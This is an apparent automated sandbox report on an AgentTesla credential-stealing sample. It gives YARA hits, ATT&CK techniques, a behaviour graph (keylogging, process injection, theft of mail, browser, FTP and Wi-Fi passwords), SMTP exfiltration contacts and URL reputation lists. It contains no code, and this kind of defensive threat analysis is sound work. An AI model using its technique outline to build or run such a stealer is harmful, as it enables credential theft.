                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 5652, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6592, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 7068, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.721770177.0000000003F4A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.987505021.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.996293991.0000000003865000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.992160350.0000000003704000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.987543673.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.737377613.000000000416B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.993193122.00000000032F8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 7104, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 5652, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6592, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 5848, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 7068, type: MEMORY
                  Source: Yara matchFile source: 1.2.sample2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.nwama.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.nwama.exe.400000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder1Access Token Manipulation1Disable or Modify Tools11OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Input Capture111Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information2Credentials in Registry1Security Software Discovery211SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSVirtualization/Sandbox Evasion3Distributed Component Object ModelInput Capture111Scheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 339443 Sample: sample2.bin Startdate: 14/01/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Sigma detected: Capture Wi-Fi password 2->51 53 9 other signatures 2->53 8 sample2.exe 3 2->8         started        12 nwama.exe 3 2->12         started        14 nwama.exe 2 2->14         started        process3 file4 41 C:\Users\user\AppData\...\sample2.exe.log, ASCII 8->41 dropped 69 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->69 71 Injects a PE file into a foreign processes 8->71 16 sample2.exe 2 12 8->16         started        73 Antivirus detection for dropped file 12->73 75 Multi AV Scanner detection for dropped file 12->75 21 nwama.exe 9 12->21         started        23 nwama.exe 14->23         started        signatures5 process6 dnsIp7 43 us2.smtp.mailhostbox.com 208.91.198.143, 49760, 49761, 49767 PUBLIC-DOMAIN-REGISTRYUS United States 16->43 37 C:\Users\user\AppData\Local\...\nwama.exe, PE32 16->37 dropped 39 C:\Users\user\...\nwama.exe:Zone.Identifier, ASCII 16->39 dropped 55 Tries to harvest and steal WLAN passwords 16->55 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->57 59 Installs a global keyboard hook 16->59 25 netsh.exe 3 16->25         started        45 192.168.2.1 unknown unknown 21->45 27 netsh.exe 21->27         started        61 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->61 63 Tries to steal Mail credentials (via file access) 23->63 65 Tries to harvest and steal ftp login credentials 23->65 67 Tries to harvest and steal browser information (history, passwords, etc) 23->67 29 netsh.exe 23->29         started        file8 signatures9 process10 process11 31 conhost.exe 25->31         started        33 conhost.exe 27->33         started        35 conhost.exe 29->35         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  sample2.exe30%MetadefenderBrowse
                  sample2.exe81%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  sample2.exe100%AviraTR/Kryptik.bkfmg

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\nwama\nwama.exe100%AviraTR/Kryptik.bkfmg
                  C:\Users\user\AppData\Local\Temp\nwama\nwama.exe30%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\nwama\nwama.exe81%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  1.2.sample2.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  18.2.nwama.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  11.2.nwama.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.comI.TTF0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.carterandcone.comep0%Avira URL Cloudsafe
                  http://www.tiro.com.0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fonts.comicx0%Avira URL Cloudsafe
                  http://www.fontbureau.comuec0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.carterandcone.com0%URL Reputationsafe
                  http://www.carterandcone.com0%URL Reputationsafe
                  http://www.carterandcone.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.comK0%Avira URL Cloudsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fontbureau.comM.TTFN0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.krrad0%Avira URL Cloudsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.urwpp.de0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.founder.com.cn/cnc0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnb0%Avira URL Cloudsafe
                  http://www.fontbureau.comF0%URL Reputationsafe
                  http://www.fontbureau.comF0%URL Reputationsafe
                  http://www.fontbureau.comF0%URL Reputationsafe
                  http://www.founder.com.cn/cnLog0%Avira URL Cloudsafe
                  http://www.fontbureau.comsivFw0%Avira URL Cloudsafe
                  http://www.m.0%Avira URL Cloudsafe
                  http://www.sandoll.co.krt0%Avira URL Cloudsafe
                  http://eu0j0ejPMgs9.com0%Avira URL Cloudsafe
                  http://www.tiro.comn0%URL Reputationsafe
                  http://www.tiro.comn0%URL Reputationsafe
                  http://www.tiro.comn0%URL Reputationsafe
                  http://www.carterandcone.comi0%Avira URL Cloudsafe
                  http://www.carterandcone.comg0%Avira URL Cloudsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.founder.cT0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.carterandcone.comhly0%Avira URL Cloudsafe
                  http://www.fontbureau.comueS0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.tiro.comnm.0%Avira URL Cloudsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://www.tiro.comm0%Avira URL Cloudsafe
                  http://www.fontbureau.comalic0%URL Reputationsafe
                  http://www.fontbureau.comalic0%URL Reputationsafe
                  http://www.fontbureau.comalic0%URL Reputationsafe
                  http://www.founder.com.cn/cns-m0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn)0%Avira URL Cloudsafe
                  http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classes0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  		208.91.198.143
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://eu0j0ejPMgs9.comtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGsample2.exe, 00000000.00000003.649192807.0000000005045000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.comI.TTFsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers/?sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bThesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                          		high
                          http://www.carterandcone.comepsample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.com.sample2.exe, 00000000.00000003.642985385.000000000502B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-user.htmltF1sample2.exe, 00000000.00000003.648321789.0000000005049000.00000004.00000001.sdmpfalse
                            		high
                            http://www.tiro.comnwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersnwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fonts.comicxsample2.exe, 00000000.00000003.642811892.000000000502B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comuecsample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersZsample2.exe, 00000000.00000003.647892711.0000000005049000.00000004.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comsample2.exe, 00000000.00000003.645220057.000000000504E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comsample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comKsample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.typography.netDsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cThesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designerserssample2.exe, 00000000.00000003.647942862.0000000005049000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/DPleasesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comM.TTFNsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fonts.comsample2.exe, 00000000.00000003.642777953.000000000502B000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krsample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sandoll.co.krradsample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urwpp.deDPleasesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.desample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sakkal.comsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cncsample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnbsample2.exe, 00000000.00000003.644029155.000000000504D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comsample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comFsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnLogsample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comsivFwsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.m.sample2.exe, 00000000.00000003.644379621.0000000005014000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sandoll.co.krtsample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comnsample2.exe, 00000000.00000003.642985385.000000000502B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comisample2.exe, 00000000.00000003.645020096.000000000504E000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comgsample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comlsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.cTsample2.exe, 00000000.00000003.644379621.0000000005014000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cnsample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-user.htmlsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.carterandcone.comhlysample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comueSsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.tiro.comnm.sample2.exe, 00000000.00000003.643012662.000000000502B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comosample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.tiro.commsample2.exe, 00000000.00000003.642940134.000000000502B000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comalicsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers;sample2.exe, 00000000.00000003.648093017.0000000005049000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cns-msample2.exe, 00000000.00000003.644029155.000000000504D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/sample2.exe, 00000000.00000003.647869153.0000000005049000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn)sample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
